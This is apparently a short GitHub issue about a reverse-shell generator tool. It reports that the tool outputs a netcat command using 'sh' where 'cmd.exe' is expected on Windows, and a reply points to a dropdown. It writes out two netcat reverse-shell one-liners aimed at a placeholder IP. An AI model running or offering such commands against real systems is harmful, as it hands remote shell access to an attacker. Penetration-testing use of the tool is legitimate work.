reverse-shell-generator
reverse-shell-generator copied to clipboard
nc.exe wrong command
When you try to generate a nc.exe revshell. the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe -e cmd.exe 10.10.10.10 4444.
You can change the shell with dropdown options.
